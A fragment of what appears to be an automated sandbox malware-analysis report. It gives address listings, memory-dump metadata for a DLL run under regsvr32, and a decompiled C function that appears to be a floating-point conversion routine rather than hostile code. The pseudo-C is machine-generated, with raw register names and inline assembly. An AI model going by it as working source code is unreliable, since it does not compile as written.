                                                                              0x10014d18
                                                                              0x10014d18
                                                                              0x10014d1b
                                                                              0x10014d2a
                                                                              0x10014d2a
                                                                              0x10014d1b
                                                                              0x10014d16
                                                                              0x10014d11
                                                                              0x10014d0c
                                                                              0x10014d07
                                                                              0x10014cfe
                                                                              0x00000000
                                                                              0x10014cf4
                                                                              0x10014ac9
                                                                              0x10014acd
                                                                              0x10014cdf
                                                                              0x10014ad3
                                                                              0x10014ad3
                                                                              0x10014ad7
                                                                              0x10014bc6
                                                                              0x10014bca
                                                                              0x10014cc1
                                                                              0x10014cc9
                                                                              0x10014ccc
                                                                              0x10014cd2
                                                                              0x10014bd0
                                                                              0x10014bd0
                                                                              0x10014bd4
                                                                              0x10014c88
                                                                              0x10014c93
                                                                              0x10014c9a
                                                                              0x10014caa
                                                                              0x10014bda
                                                                              0x10014bda
                                                                              0x10014bde
                                                                              0x10014c70
                                                                              0x10014c7e
                                                                              0x10014be4
                                                                              0x10014be4
                                                                              0x10014be8
                                                                              0x10014c61
                                                                              0x10014c63
                                                                              0x10014bea
                                                                              0x10014bea
                                                                              0x10014bee
                                                                              0x10014c45
                                                                              0x10014c51
                                                                              0x10014c57
                                                                              0x10014bf0
                                                                              0x10014bf0
                                                                              0x10014bf4
                                                                              0x10014bf7
                                                                              0x10014c05
                                                                              0x10014c09
                                                                              0x10014c0d
                                                                              0x10014c29
                                                                              0x10014c31
                                                                              0x10014c0f
                                                                              0x10014c12
                                                                              0x10014c1a
                                                                              0x10014c22
                                                                              0x10014c22
                                                                              0x10014c0d
                                                                              0x10014bf7
                                                                              0x10014bee
                                                                              0x10014be8
                                                                              0x10014bde
                                                                              0x10014bd4
                                                                              0x10014add
                                                                              0x10014add
                                                                              0x10014ae1
                                                                              0x10014bb4
                                                                              0x10014bbf
                                                                              0x10014ae7
                                                                              0x10014ae7
                                                                              0x10014ae7
                                                                              0x10014aeb
                                                                              0x10014baa
                                                                              0x10014af1
                                                                              0x10014af1
                                                                              0x10014af1
                                                                              0x10014af4
                                                                              0x10014b78
                                                                              0x10014b83
                                                                              0x10014b8d
                                                                              0x10014b9a
                                                                              0x10014af6
                                                                              0x10014af6
                                                                              0x10014af6
                                                                              0x10014af9
                                                                              0x10014b63
                                                                              0x10014b6e
                                                                              0x10014afb
                                                                              0x10014afb
                                                                              0x10014afb
                                                                              0x10014afe
                                                                              0x10014b4e
                                                                              0x10014b59
                                                                              0x10014b00
                                                                              0x10014b00
                                                                              0x10014b00
                                                                              0x10014b03
                                                                              0x10014b33
                                                                              0x10014b3b
                                                                              0x10014b3e
                                                                              0x10014b44
                                                                              0x10014b05
                                                                              0x10014b05
                                                                              0x10014b08
                                                                              0x10014b11
                                                                              0x10014b1c
                                                                              0x10014b1c
                                                                              0x10014b08
                                                                              0x10014b03
                                                                              0x10014afe
                                                                              0x10014af9
                                                                              0x10014af4
                                                                              0x10014aeb
                                                                              0x10014ae1
                                                                              0x10014ad7
                                                                              0x1001463e
                                                                              0x1001463e
                                                                              0x10014642
                                                                              0x10014ab5
                                                                              0x10014648
                                                                              0x10014648
                                                                              0x1001464c
                                                                              0x10014954
                                                                              0x10014958
                                                                              0x100149f4
                                                                              0x100149f4
                                                                              0x100149f8
                                                                              0x10014a9c
                                                                              0x10014aa6
                                                                              0x100149fe
                                                                              0x100149fe
                                                                              0x100149fe
                                                                              0x10014a01
                                                                              0x10014a80
                                                                              0x10014a84
                                                                              0x10014a8e
                                                                              0x10014a03
                                                                              0x10014a03
                                                                              0x10014a03
                                                                              0x10014a06
                                                                              0x10014a64
                                                                              0x10014a68
                                                                              0x10014a72
                                                                              0x10014a08
                                                                              0x10014a08
                                                                              0x10014a08
                                                                              0x10014a0b
                                                                              0x10014a48
                                                                              0x10014a56
                                                                              0x10014a0d
                                                                              0x10014a0d
                                                                              0x10014a0d
                                                                              0x10014a10
                                                                              0x10014a3b
                                                                              0x10014a12
                                                                              0x10014a12
                                                                              0x10014a15
                                                                              0x10014a23
                                                                              0x10014a26
                                                                              0x10014a26
                                                                              0x10014a15
                                                                              0x10014a10
                                                                              0x10014a0b
                                                                              0x10014a06
                                                                              0x10014a01
                                                                              0x1001495e
                                                                              0x1001495e
                                                                              0x10014962
                                                                              0x100149e2
                                                                              0x100149ed
                                                                              0x10014964
                                                                              0x10014964
                                                                              0x10014964
                                                                              0x10014968
                                                                              0x100149d4
                                                                              0x1001496a
                                                                              0x1001496a
                                                                              0x1001496a
                                                                              0x1001496d
                                                                              0x100149c4
                                                                              0x1001496f
                                                                              0x1001496f
                                                                              0x1001496f
                                                                              0x10014972
                                                                              0x100149b7
                                                                              0x10014974
                                                                              0x10014974
                                                                              0x10014974
                                                                              0x10014977
                                                                              0x100149a7
                                                                              0x10014979
                                                                              0x10014979
                                                                              0x10014979
                                                                              0x1001497c
                                                                              0x1001499d
                                                                              0x1001497e
                                                                              0x1001497e
                                                                              0x10014981
                                                                              0x10014987
                                                                              0x10014990
                                                                              0x10014990
                                                                              0x10014981
                                                                              0x1001497c
                                                                              0x10014977
                                                                              0x10014972
                                                                              0x1001496d
                                                                              0x10014968
                                                                              0x10014962
                                                                              0x10014652
                                                                              0x10014652
                                                                              0x10014656
                                                                              0x1001493d
                                                                              0x10014948
                                                                              0x1001494a
                                                                              0x1001465c
                                                                              0x1001465c
                                                                              0x10014660
                                                                              0x10014818
                                                                              0x10014818
                                                                              0x1001481c
                                                                              0x100148f1
                                                                              0x100148f7
                                                                              0x100148fb
                                                                              0x10014900
                                                                              0x1001490c
                                                                              0x1001490e
                                                                              0x10014917
                                                                              0x10014921
                                                                              0x10014822
                                                                              0x10014822
                                                                              0x10014822
                                                                              0x10014825
                                                                              0x100148cb
                                                                              0x100148d7
                                                                              0x100148e2
                                                                              0x1001482b
                                                                              0x1001482b
                                                                              0x1001482b
                                                                              0x1001482e
                                                                              0x100148a4
                                                                              0x100148b4
                                                                              0x10014830
                                                                              0x10014830
                                                                              0x10014830
                                                                              0x10014833
                                                                              0x1001487d
                                                                              0x10014885
                                                                              0x10014888
                                                                              0x10014893
                                                                              0x10014835
                                                                              0x10014835
                                                                              0x10014835
                                                                              0x10014838
                                                                              0x10014863
                                                                              0x1001483a
                                                                              0x1001483a
                                                                              0x1001483d
                                                                              0x1001484c
                                                                              0x1001484e
                                                                              0x1001484e
                                                                              0x1001483d
                                                                              0x10014838
                                                                              0x10014833
                                                                              0x1001482e
                                                                              0x10014825
                                                                              0x10014666
                                                                              0x10014666
                                                                              0x1001466a
                                                                              0x10014769
                                                                              0x1001476f
                                                                              0x10014773
                                                                              0x1001477d
                                                                              0x10014786
                                                                              0x1001478e
                                                                              0x10014791
                                                                              0x10014796
                                                                              0x10014799
                                                                              0x1001479b
                                                                              0x100147a2
                                                                              0x100147a5
                                                                              0x100147b3
                                                                              0x100147c0
                                                                              0x100147c3
                                                                              0x100147c7
                                                                              0x100147c7
                                                                              0x100147cf
                                                                              0x100147cf
                                                                              0x100147d4
                                                                              0x100147e2
                                                                              0x100147e4
                                                                              0x100147ed
                                                                              0x100147f9
                                                                              0x10014803
                                                                              0x1001480e
                                                                              0x10014670
                                                                              0x10014670
                                                                              0x10014670
                                                                              0x10014673
                                                                              0x1001474a
                                                                              0x1001475a
                                                                              0x10014679
                                                                              0x10014679
                                                                              0x10014679
                                                                              0x1001467c
                                                                              0x1001473d
                                                                              0x10014682
                                                                              0x10014682
                                                                              0x10014682
                                                                              0x10014685
                                                                              0x10014728
                                                                              0x1001468b
                                                                              0x1001468b
                                                                              0x1001468b
                                                                              0x1001468e
                                                                              0x10014713
                                                                              0x10014690
                                                                              0x10014690
                                                                              0x10014690
                                                                              0x10014693
                                                                              0x100146e8
                                                                              0x100146f0
                                                                              0x100146f3
                                                                              0x100146fe
                                                                              0x10014695
                                                                              0x10014695
                                                                              0x10014695
                                                                              0x10014698
                                                                              0x100146bb
                                                                              0x100146ce
                                                                              0x1001469a
                                                                              0x1001469a
                                                                              0x1001469d
                                                                              0x100146ae
                                                                              0x100146ae
                                                                              0x1001469d
                                                                              0x10014698
                                                                              0x10014693
                                                                              0x1001468e
                                                                              0x10014685
                                                                              0x1001467c
                                                                              0x10014673
                                                                              0x1001466a
                                                                              0x10014660
                                                                              0x10014656
                                                                              0x1001464c
                                                                              0x10014642
                                                                              0x00000000
                                                                              0x100145b1
                                                                              0x00000000
                                                                              0x100145b1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10014590
                                                                              0x10014590
                                                                              0x10014590
                                                                              0x10014593
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10014595
                                                                              0x10014598
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001459a
                                                                              0x1001459d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001459f
                                                                              0x1001459f
                                                                              0x100145a3
                                                                              0x100145a3
                                                                              0x00000000
                                                                              0x100145f6
                                                                              0x100145f6
                                                                              0x100145f8
                                                                              0x100145fb
                                                                              0x100145fe
                                                                              0x10014600
                                                                              0x10014600
                                                                              0x10014efb
                                                                              0x00000000
                                                                              0x10014efb
                                                                              0x1001452a
                                                                              0x1001452f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10014531
                                                                              0x10014536
                                                                              0x1001453b
                                                                              0x10014540
                                                                              0x10014548
                                                                              0x1001454b
                                                                              0x00000000
                                                                              0x1001454d
                                                                              0x10014554
                                                                              0x1001455b
                                                                              0x00000000
                                                                              0x10014561
                                                                              0x00000000
                                                                              0x10014561
                                                                              0x1001455b
                                                                              0x1001448d
                                                                              0x10014494
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10014496
                                                                              0x1001449d
                                                                              0x100144a8
                                                                              0x100144a8
                                                                              0x100144af
                                                                              0x100144ba
                                                                              0x100144ba
                                                                              0x100144c1
                                                                              0x100144c4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100144c6
                                                                              0x100144d5
                                                                              0x100144da
                                                                              0x100144dd
                                                                              0x100144e0
                                                                              0x100144e3
                                                                              0x100144e9
                                                                              0x100144eb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100144eb
                                                                              0x100144b1
                                                                              0x100144b8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100144b8
                                                                              0x1001449f
                                                                              0x100144a6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100144a6
                                                                              0x10014464
                                                                              0x10014468
                                                                              0x1001446e
                                                                              0x10014473
                                                                              0x10014475
                                                                              0x00000000
                                                                              0x10014477
                                                                              0x10014477
                                                                              0x00000000
                                                                              0x10014477
                                                                              0x10014475
                                                                              0x10014413
                                                                              0x10014417
                                                                              0x10014435
                                                                              0x00000000
                                                                              0x10014435
                                                                              0x10014427
                                                                              0x1001442d
                                                                              0x1001442f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x100143ea
                                                                              0x100143fb
                                                                              0x00000000
                                                                              0x100143fd
                                                                              0x100143fd
                                                                              0x10014402
                                                                              0x10014402
                                                                              0x100143fb

                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ef24a4d8d2c9513dab551889f4990873cdb94d962d2a90a48fd63ae196257ea2
                                                                              • Instruction ID: a88a7d9feea92022a0c0b2fadb8d5e60f9a424e546bdcda3fd6435a6a5a7556d
                                                                              • Opcode Fuzzy Hash: ef24a4d8d2c9513dab551889f4990873cdb94d962d2a90a48fd63ae196257ea2
                                                                              • Instruction Fuzzy Hash: 7732B4267266D48ADE94DB22A46436DA2D1F78AFC0F564926AE4B5FF64DF3CC4C0C300
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1004DE90 Relevance: .5, Instructions: 506COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 96%
                                                                              			E1004DE90(signed int __edx, signed int __rbx, signed short* __rcx, signed int* __rdx, signed long long __rdi, long long __rsi, long long __rbp, signed long long __r9, void* __r10, void* __r11, long long __r12, long long __r13, long long __r14, long long __r15, signed int _a8, void* _a16, void* _a24, long long _a32) {
				void* _v8;
				void* _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				void* _v48;
				intOrPtr _v72;
				char _v80;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v104;
				signed int _t195;
				signed int _t203;
				intOrPtr _t211;
				signed int _t212;
				signed int _t214;
				intOrPtr _t218;
				intOrPtr _t221;
				signed int _t222;
				signed int _t224;
				signed int _t229;
				signed int _t231;
				signed int _t236;
				intOrPtr _t242;
				signed int _t244;
				signed int _t246;
				signed int _t253;
				signed int _t255;
				signed int _t259;
				signed int _t265;
				signed int _t267;
				signed int _t271;
				signed int _t274;
				signed int _t276;
				signed int _t287;
				intOrPtr _t293;
				signed int _t306;
				intOrPtr _t310;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				unsigned int _t315;
				signed int _t318;
				unsigned int _t319;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				unsigned int _t329;
				signed int _t332;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t340;
				signed int _t346;
				signed int _t349;
				signed int _t351;
				signed int _t353;
				void* _t359;
				long long _t360;
				intOrPtr* _t363;
				signed int _t364;
				signed long long _t366;
				signed int _t367;
				intOrPtr* _t370;
				signed int _t372;
				signed int _t374;
				signed int _t376;
				signed int _t377;
				signed long long _t379;
				signed long long _t381;
				signed int* _t382;
				signed long long _t383;
				signed long long _t384;
				signed long long _t385;
				signed int _t387;
				signed long long _t388;
				signed int _t390;
				signed long long _t391;
				signed int _t392;
				signed long long _t393;
				signed long long _t394;
				signed long long _t395;
				void* _t402;
				void* _t403;
				signed long long _t404;
				signed long long _t405;
				signed long long _t406;
				signed long long _t407;
				signed long long _t408;
				signed long long _t409;
				signed long long _t414;
				void* _t415;
				signed long long _t416;
				void* _t417;
				signed long long _t419;
				long long _t421;
				long long _t425;
				signed long long _t427;

				_t425 = __r14;
				_t421 = __r13;
				_t417 = __r11;
				_t415 = __r10;
				_t414 = __r9;
				_t395 = __rdi;
				_t382 = __rdx;
				_t367 = __rbx;
				_a16 = __rdx;
				_t359 = _t402;
				 *((long long*)(_t359 + 0x18)) = __rbx;
				 *((long long*)(_t359 - 8)) = __rsi;
				 *((long long*)(_t359 - 0x10)) = __rdi;
				 *((long long*)(_t359 - 0x30)) = __r15;
				_t195 = __rcx[5] & 0x0000ffff;
				r9d = 0x1f;
				_a8 = _t195 & 0x00008000;
				_v96 = __rcx[3];
				_t340 = (_t195 & 0x00007fff) - 0x3fff;
				_v92 = __rcx[1];
				_v88 = ( *__rcx & 0x0000ffff) << 0x10;
				if(_t340 != 0xffffc001) {
					_t370 =  &_v96;
					_a32 = __rbp;
					_v24 = __r12;
					_t360 =  *_t370;
					_v40 = __r14;
					r14d =  *0x100709e0; // 0x35
					_v80 = _t360;
					_t337 = 0;
					_v72 =  *((intOrPtr*)(_t370 + 8));
					r11d = r9d;
					asm("cdq");
					r15d = _t340;
					_t274 = 0;
					_t312 = __edx & r9d;
					_t203 = r14d + _t312;
					r10d = _t203;
					r10d = r10d >> 5;
					_t419 = r10d;
					r11d = r11d - (_t203 & r9d) - _t312;
					__eflags = r11d;
					asm("inc esp");
					if(r11d >= 0) {
						L23:
						_t283 = r11d;
						_v32 = _t421;
						r13d = 3;
						 *(_t402 + 0x28 + _t419 * 4) =  *(_t402 + 0x28 + _t419 * 4) & 0xffffffff << r11d;
						_t61 = _t415 + 1; // 0xb00000036
						_t208 = _t61;
						_t383 = _t61;
						__eflags = _t383 - _t421;
						if(_t383 < _t421) {
							__eflags = _t421 - _t383 << 2;
							E1003A240(_t208, _t283, 0, _t402 + 0x28 + _t383 * 4, _t383, _t421 - _t383 << 2);
						}
						__eflags = _t274;
						if(_t274 != 0) {
							_t340 = _t340 + 1;
							__eflags = _t340;
						}
						_t313 =  *0x100709dc; // 0xfffffc01
						__eflags = _t340 - _t313 - r14d;
						if(_t340 >= _t313 - r14d) {
							__eflags = _t340 - _t313;
							if(_t340 > _t313) {
								__eflags = _t340 -  *0x100709d8; // 0x400
								if(__eflags < 0) {
									_t211 =  *0x100709e4; // 0xb
									r9d =  *0x100709ec; // 0x3ff
									asm("btr dword [esp+0x28], 0x1f");
									asm("cdq");
									r9d = r9d + _t340;
									_t314 = _t313 & 0x0000001f;
									r10d = _t337;
									_t404 = _t395;
									_t212 = _t211 + _t314;
									_t214 = (_t212 & 0x0000001f) - _t314;
									_t276 = _t212 >> 5;
									r11d = _t214;
									__eflags = 0x20;
									_t349 =  !(0xffffffff << _t214);
									do {
										_t315 =  *(_t402 + 0x28 + _t404 * 4);
										_v104 = _t349 & _t315;
										_t404 = _t404 + 1;
										r10d = _v104;
										 *(_t402 + 0x24 + _t404 * 4) = _t315 >> r11d | r10d;
										r10d = r10d << 0x20;
										__eflags = _t404 - _t421;
									} while (_t404 < _t421);
									_t384 = _t276;
									_t372 =  &_v88 - _t384 * 4;
									__eflags = _t372;
									do {
										__eflags = _t367 - _t384;
										if(_t367 < _t384) {
											 *(_t402 + 0x28 + _t367 * 4) = _t337;
										} else {
											 *(_t402 + 0x28 + _t367 * 4) =  *_t372;
										}
										_t372 = _t372 - 4;
										_t367 = _t367 - 1;
										__eflags = _t367;
									} while (_t367 >= 0);
									_t382 = _a16;
									r15d = 0x1f;
									goto L79;
								}
								_t221 =  *0x100709e4; // 0xb
								_v96 = _t395;
								asm("bts dword [esp+0x28], 0x1f");
								asm("cdq");
								_v88 = _t337;
								_t318 = _t313 & 0x0000001f;
								r9d = _t337;
								_t405 = _t395;
								_t222 = _t221 + _t318;
								r11d = _t222;
								_t224 = (_t222 & 0x0000001f) - _t318;
								r11d = r11d >> 5;
								r10d = _t224;
								__eflags = 0x20;
								_t351 =  !(0xffffffff << _t224);
								do {
									_t319 =  *(_t402 + 0x28 + _t405 * 4);
									_v104 = _t351 & _t319;
									_t405 = _t405 + 1;
									r9d = _v104;
									 *(_t402 + 0x24 + _t405 * 4) = _t319 >> r10d | r9d;
									r9d = r9d << 0x20;
									__eflags = _t405 - _t421;
								} while (_t405 < _t421);
								_t385 = r11d;
								_t374 =  &_v88 - _t385 * 4;
								__eflags = _t374;
								do {
									__eflags = _t367 - _t385;
									if(_t367 < _t385) {
										 *(_t402 + 0x28 + _t367 * 4) = _t337;
									} else {
										 *(_t402 + 0x28 + _t367 * 4) =  *_t374;
									}
									_t374 = _t374 - 4;
									_t367 = _t367 - 1;
									__eflags = _t367;
								} while (_t367 >= 0);
								_t293 =  *0x100709d8; // 0x400
								r9d =  *0x100709ec; // 0x3ff
								_t382 = _a16;
								_t337 = 1;
								r9d = r9d + _t293;
								_t163 = _t395 + 0x1e; // 0x1f
								r15d = _t163;
								goto L79;
							}
							_t322 = _t313 - r15d;
							_t363 =  &_v80;
							r10d = 0xffffffff;
							r9d = _t337;
							_v96 =  *_t363;
							asm("cdq");
							_v88 =  *((intOrPtr*)(_t363 + 8));
							_t323 = _t322 & 0x0000001f;
							_t406 = _t395;
							_t229 = _t322 + _t323;
							r12d = _t229;
							_t231 = (_t229 & 0x0000001f) - _t323;
							r12d = r12d >> 5;
							r11d = _t231;
							r10d = r10d << _t231;
							__eflags = 0x20;
							r10d =  !r10d;
							do {
								_t324 =  *(_t402 + 0x28 + _t406 * 4);
								_t406 = _t406 + 1;
								_t326 = _t324 >> r11d | r9d;
								_v104 = _t324 & r10d;
								 *(_t402 + 0x24 + _t406 * 4) = _t326;
								r9d = _v104;
								r9d = r9d << 0x20;
								__eflags = _t406 - _t421;
							} while (_t406 < _t421);
							_t407 = r12d;
							_t364 = _t407 * 4;
							_t376 = _t367;
							_t387 =  &_v88 - _t364;
							__eflags = _t387;
							do {
								__eflags = _t376 - _t407;
								if(_t376 < _t407) {
									 *(_t402 + 0x28 + _t376 * 4) = _t337;
								} else {
									 *(_t402 + 0x28 + _t376 * 4) =  *_t387;
								}
								_t387 = _t387 - 4;
								_t376 = _t376 - 1;
								__eflags = _t376;
							} while (_t376 >= 0);
							r8d =  *0x100709e0; // 0x35
							r15d = 0x1f;
							r12d = r15d;
							asm("cdq");
							_t327 = _t326 & 0x0000001f;
							_t236 = r8d + _t327;
							r11d = _t236;
							r11d = r11d >> 5;
							_t427 = r11d;
							r12d = r12d - (_t236 & 0x0000001f) - _t327;
							__eflags = r12d;
							asm("inc esp");
							if(r12d >= 0) {
								L52:
								_t299 = r12d;
								 *(_t402 + 0x28 + _t427 * 4) =  *(_t402 + 0x28 + _t427 * 4) & 0xffffffff << r12d;
								_t123 = _t417 + 1; // 0xb00000036
								_t241 = _t123;
								_t388 = _t123;
								__eflags = _t388 - _t421;
								if(_t388 < _t421) {
									_t327 = 0;
									__eflags = _t421 - _t388 << 2;
									E1003A240(_t241, _t299, 0, _t402 + 0x28 + _t388 * 4, _t388, _t421 - _t388 << 2);
								}
								_t242 =  *0x100709e4; // 0xb
								r9d = _t337;
								_t408 = _t395;
								asm("cdq");
								_t328 = _t327 & r15d;
								_t244 = _t242 + 1 + _t328;
								r11d = _t244;
								_t246 = (_t244 & r15d) - _t328;
								r11d = r11d >> 5;
								r10d = _t246;
								_t346 = 0x20 - _t246;
								__eflags = _t346;
								_t353 =  !(0xffffffff << _t246);
								do {
									_t329 =  *(_t402 + 0x28 + _t408 * 4);
									_v104 = _t353 & _t329;
									_t408 = _t408 + 1;
									r9d = _v104;
									 *(_t402 + 0x24 + _t408 * 4) = _t329 >> r10d | r9d;
									r9d = r9d << _t346;
									__eflags = _t408 - 3;
								} while (_t408 < 3);
								_t409 = r11d;
								_t377 = _t367;
								_t390 =  &_v88 - _t409 * 4;
								__eflags = _t390;
								do {
									__eflags = _t377 - _t409;
									if(_t377 < _t409) {
										 *(_t402 + 0x28 + _t377 * 4) = _t337;
									} else {
										 *(_t402 + 0x28 + _t377 * 4) =  *_t390;
									}
									_t390 = _t390 - 4;
									_t377 = _t377 - 1;
									__eflags = _t377;
								} while (_t377 >= 0);
								_t382 = _a16;
								r9d = _t337;
								_t337 = 2;
								goto L79;
							}
							_t391 = r11d;
							_t253 =  !(0xffffffff << r12d);
							__eflags =  *(_t402 + 0x28 + _t391 * 4) & _t253;
							if(( *(_t402 + 0x28 + _t391 * 4) & _t253) != 0) {
								L43:
								_t101 = _t407 - 1; // 0xb00000034
								r8d = 1;
								asm("cdq");
								_t332 = _t327 & r15d;
								_t255 = _t101 + _t332;
								r9d = _t255;
								r9d = r9d >> 5;
								_t416 = r9d;
								r8d = r8d << r15d - (_t255 & r15d) - _t332;
								_t306 = _t337;
								_t327 = _t364 + _t407;
								__eflags = _t327 -  *(_t402 + 0x28 + _t416 * 4);
								if(_t327 <  *(_t402 + 0x28 + _t416 * 4)) {
									L45:
									_t306 = 1;
									L46:
									_t106 = _t414 - 1; // 0x0
									_t259 = _t106;
									 *(_t402 + 0x28 + _t416 * 4) = _t327;
									__eflags = _t259;
									_t392 = _t259;
									if(_t259 < 0) {
										goto L52;
									} else {
										goto L47;
									}
									while(1) {
										L47:
										__eflags = _t306;
										if(_t306 == 0) {
											goto L52;
										}
										_t306 = _t337;
										r8d = _t364 + 1;
										__eflags = r8d -  *(_t402 + 0x28 + _t392 * 4);
										if(r8d <  *(_t402 + 0x28 + _t392 * 4)) {
											L50:
											_t306 = 1;
											L51:
											 *(_t402 + 0x28 + _t392 * 4) = r8d;
											_t392 = _t392 - 1;
											__eflags = _t392;
											if(_t392 >= 0) {
												continue;
											}
											goto L52;
										}
										__eflags = r8d - 1;
										if(r8d >= 1) {
											goto L51;
										}
										goto L50;
									}
									goto L52;
								}
								__eflags = _t327 - r8d;
								if(_t327 >= r8d) {
									goto L46;
								}
								goto L45;
							}
							_t97 = _t417 + 1; // 0xb00000036
							_t379 = _t97;
							__eflags = _t379 - _t421;
							if(_t379 >= _t421) {
								goto L52;
							} else {
								goto L40;
							}
							while(1) {
								L40:
								__eflags =  *((intOrPtr*)(_t402 + 0x28 + _t379 * 4)) - _t337;
								if( *((intOrPtr*)(_t402 + 0x28 + _t379 * 4)) != _t337) {
									goto L43;
								}
								_t379 = _t379 + 1;
								__eflags = _t379 - _t421;
								if(_t379 < _t421) {
									continue;
								}
								goto L52;
							}
							goto L43;
						} else {
							_t382 = _a16;
							_v96 = _t395;
							_v88 = _t337;
							r9d = _t337;
							_t337 = 2;
							_t68 = _t395 + 0x1d; // 0x1f
							r15d = _t68;
							L79:
							L80:
							r15d = r15d -  *0x100709e4;
							_t218 =  *0x100709e8; // 0x40
							_t287 = r15b & 0xffffffff;
							r9d = r9d << _t287;
							_a8 =  ~_a8;
							asm("sbb ecx, ecx");
							r9d = r9d | _t287 & 0x80000000;
							r9d = r9d | _v96;
							if(_t218 != 0x40) {
								__eflags = _t218 - 0x20;
								if(_t218 == 0x20) {
									 *_t382 = r9d;
								}
								return _t337;
							} else {
								_t382[1] = r9d;
								 *_t382 = _v92;
								return _t337;
							}
						}
					}
					_t393 = r10d;
					_t265 =  !(0xffffffff << r11d);
					__eflags =  *(_t402 + 0x28 + _t393 * 4) & _t265;
					if(( *(_t402 + 0x28 + _t393 * 4) & _t265) != 0) {
						L13:
						_t38 = _t425 - 1; // 0xb00000034
						asm("cdq");
						_t334 = _t312 & r9d;
						_t267 = _t38 + _t334;
						r8d = _t267;
						r8d = r8d >> 5;
						_t414 = r8d;
						_t336 = 1 << r9d - (_t267 & r9d) - _t334;
						_t310 = _t360 + _t393;
						__eflags = _t310 -  *((intOrPtr*)(_t402 + 0x28 + _t414 * 4));
						if(_t310 <  *((intOrPtr*)(_t402 + 0x28 + _t414 * 4))) {
							L15:
							_t274 = 1;
							L16:
							_t43 = _t403 - 1; // 0xb00000033
							_t271 = _t43;
							 *((intOrPtr*)(_t402 + 0x28 + _t414 * 4)) = _t310;
							__eflags = _t271;
							_t394 = _t271;
							if(_t271 < 0) {
								goto L23;
							}
							while(1) {
								__eflags = _t274;
								if(_t274 == 0) {
									goto L23;
								}
								_t274 = _t337;
								r8d = _t360 + 1;
								__eflags = r8d -  *(_t402 + 0x28 + _t394 * 4);
								if(r8d <  *(_t402 + 0x28 + _t394 * 4)) {
									L21:
									_t274 = 1;
									L22:
									 *(_t402 + 0x28 + _t394 * 4) = r8d;
									_t394 = _t394 - 1;
									__eflags = _t394;
									if(_t394 >= 0) {
										continue;
									}
									goto L23;
								}
								__eflags = r8d - 1;
								if(r8d >= 1) {
									goto L22;
								}
								goto L21;
							}
							goto L23;
						}
						__eflags = _t310 - _t336;
						if(_t310 >= _t336) {
							goto L16;
						}
						goto L15;
					}
					_t34 = _t415 + 1; // 0xb00000036
					_t381 = _t34;
					__eflags = _t381 - 3;
					if(_t381 >= 3) {
						goto L23;
					}
					while(1) {
						__eflags =  *((intOrPtr*)(_t402 + 0x28 + _t381 * 4)) - _t274;
						if( *((intOrPtr*)(_t402 + 0x28 + _t381 * 4)) != _t274) {
							goto L13;
						}
						_t381 = _t381 + 1;
						__eflags = _t381 - 3;
						if(_t381 < 3) {
							continue;
						}
						goto L23;
					}
					goto L13;
				}
				_t337 = 0;
				r9d = 0;
				_t366 = __rdi;
				while( *((intOrPtr*)(_t402 + 0x28 + _t366 * 4)) == _t337) {
					_t366 = _t366 + 1;
					if(_t366 < 3) {
						continue;
					}
					r15d = 0x1f;
					goto L80;
				}
				_v96 = _t395;
				_v88 = _t337;
				_t337 = 2;
				_t18 = _t395 + 0x1d; // 0x1f
				r15d = _t18;
				goto L80;
			}









































































































                                                                              0x1004de90
                                                                              0x1004de90
                                                                              0x1004de90
                                                                              0x1004de90
                                                                              0x1004de90
                                                                              0x1004de90
                                                                              0x1004de90
                                                                              0x1004de90
                                                                              0x1004de90
                                                                              0x1004de95
                                                                              0x1004de9f
                                                                              0x1004dea3
                                                                              0x1004dea7
                                                                              0x1004deab
                                                                              0x1004deaf
                                                                              0x1004deb3
                                                                              0x1004dec0
                                                                              0x1004ded0
                                                                              0x1004ded7
                                                                              0x1004dedd
                                                                              0x1004deed
                                                                              0x1004def1
                                                                              0x1004df32
                                                                              0x1004df37
                                                                              0x1004df3f
                                                                              0x1004df44
                                                                              0x1004df47
                                                                              0x1004df4c
                                                                              0x1004df53
                                                                              0x1004df5b
                                                                              0x1004df5d
                                                                              0x1004df64
                                                                              0x1004df67
                                                                              0x1004df68
                                                                              0x1004df6b
                                                                              0x1004df6d
                                                                              0x1004df75
                                                                              0x1004df77
                                                                              0x1004df7d
                                                                              0x1004df83
                                                                              0x1004df86
                                                                              0x1004df86
                                                                              0x1004df8e
                                                                              0x1004df92
                                                                              0x1004e049
                                                                              0x1004e049
                                                                              0x1004e04e
                                                                              0x1004e055
                                                                              0x1004e05b
                                                                              0x1004e060
